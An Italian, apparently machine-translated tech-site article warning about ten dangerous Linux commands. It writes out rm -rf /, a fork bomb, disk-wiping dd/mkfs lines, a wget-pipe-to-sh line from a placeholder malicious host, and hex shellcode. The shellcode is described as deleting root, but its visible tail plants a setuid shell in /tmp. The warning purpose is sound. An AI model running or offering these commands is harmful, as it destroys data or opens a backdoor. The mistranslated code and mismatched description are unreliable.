1. Comando rm -rf
Il comando rm -rf è uno dei modi più veloci per eliminare una cartella e il suo contenuto. Ma un piccolo errore di battitura o ignoranza può causare danni irreparabili al sistema. Alcune delle opzioni utilizzate con il comando rm sono.
- Il comando rm in Linux viene utilizzato per eliminare i file.
- Il comando rm -r cancella la cartella in modo ricorsivo, anche la cartella vuota.
- Il comando rm -f rimuove “File di sola lettura” senza chiedere.
- rm -rf / : Forza la cancellazione di tutto nella directory principale.
- rm -rf * : Forza la cancellazione di tutto nella directory corrente/di lavoro.
- rm -rf . : Forza l’eliminazione della cartella e delle sottocartelle correnti.
Quindi, fai attenzione quando esegui il comando rm -rf . Per evitare l’eliminazione accidentale del file con il comando ‘ rm ‘, crea un alias del comando ‘ rm ‘ come ‘ rm -i ‘ nel file “ .bashrc ”, ti chiederà di confermare ogni eliminazione.
2. :(){:|:&};: Comando
Quanto sopra è in realtà una bomba a forcella . Opera definendo una funzione chiamata ‘ : ‘, che si richiama due volte, una in primo piano e una in background. Continua a funzionare ancora e ancora fino a quando il sistema si blocca.
:(){:|:&};:
3. comando > /dev/sda
Il comando sopra scrive l’output di ‘ comando ‘ sul blocco /dev/sda . Il comando precedente scrive dati grezzi e tutti i file sul blocco verranno sostituiti con dati grezzi, con conseguente perdita totale di dati sul blocco.
4. cartella mv /dev/null
Il comando sopra sposterà ‘ cartella ‘ in /dev/null . In Linux /dev/null o null device è un file speciale che scarta tutti i dati scritti su di esso e segnala che l’operazione di scrittura ha esito positivo.
# mv /home/utente/* /dev/null
Il comando precedente sposterà tutto il contenuto di una directory User in /dev/null , che letteralmente significa tutto ciò che è stato inviato a blackhole ( null) .
5. wget http://origine_maliziosa -O- | SH
Il comando precedente scaricherà uno script da una fonte dannosa e quindi lo eseguirà. Il comando Wget scaricherà lo script e sh eseguirà lo script scaricato.
Nota : dovresti essere molto consapevole della fonte da cui stai scaricando pacchetti e script. Utilizzare solo quegli script/applicazioni scaricati da una fonte attendibile.
6. mkfs.ext3 /dev/sda
Il comando precedente formatterà il blocco ‘ sda’ e sicuramente saprai che dopo l’esecuzione del comando precedente il tuo blocco ( disco rigido ) sarebbe nuovo, NUOVO di zecca! Senza alcun dato, lasciando il tuo sistema in una fase irrecuperabile.
7. > archivio
Il comando precedente viene utilizzato per svuotare il contenuto del file. Se il comando precedente viene eseguito con un errore di battitura o ignoranza come ” > xt.conf” scriverà il file di configurazione o qualsiasi altro file di sistema o configurazione.
8. ^pippo^bar
Questo comando, come descritto nei nostri 10 comandi Linux meno conosciuti , viene utilizzato per modificare il comando di esecuzione precedente senza la necessità di riscrivere nuovamente l’intero comando. Ma questo può essere davvero problematico se non hai corso il rischio di controllare a fondo la modifica nel comando originale usando il comando ^foo^bar .
9. dd if=/dev/random of=/dev/sda
Il comando precedente cancellerà il blocco sda e scriverà dati spazzatura casuali nel blocco. Certo! Il tuo sistema verrebbe lasciato in una fase incoerente e irrecuperabile.
10. Comando NASCOSTO
Il comando seguente non è altro che il primo comando sopra ( rm -rf ). Qui i codici sono nascosti in esadecimale in modo che un utente ignorante possa essere ingannato. L’esecuzione del codice seguente nel terminale cancellerà la partizione di root .
Questo comando qui mostra che la minaccia potrebbe essere nascosta e normalmente non rilevabile a volte. Devi essere consapevole di ciò che stai facendo e quale sarebbe il risultato. Non compilare/eseguire codici da una fonte sconosciuta.
char esp[] __attributo__ ((sezione(“.testo”))) /* esp pubblicazione */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.oltre; chmod 4755 /tmp/.oltre;”;
Nota : non eseguire nessuno dei comandi precedenti nel terminale o nella shell Linux o nel computer di un amico o della scuola. Se vuoi testarli, eseguili nella macchina virtuale. Qualsiasi incoerenza o perdita di dati, dovuta all’esecuzione del comando di cui sopra, interromperà il tuo sistema per il quale né l’ Autore dell’articolo né Tecmint sono responsabili.
È tutto per ora. Presto sarò di nuovo qui con un altro articolo interessante che adorerai leggere. Fino ad allora Resta sintonizzato e connesso a Tecmint . Se conosci altri comandi Linux pericolosi e vorresti che li aggiungessimo all’elenco, comunicacelo tramite la sezione commenti e non dimenticare di fornire il tuo prezioso feedback.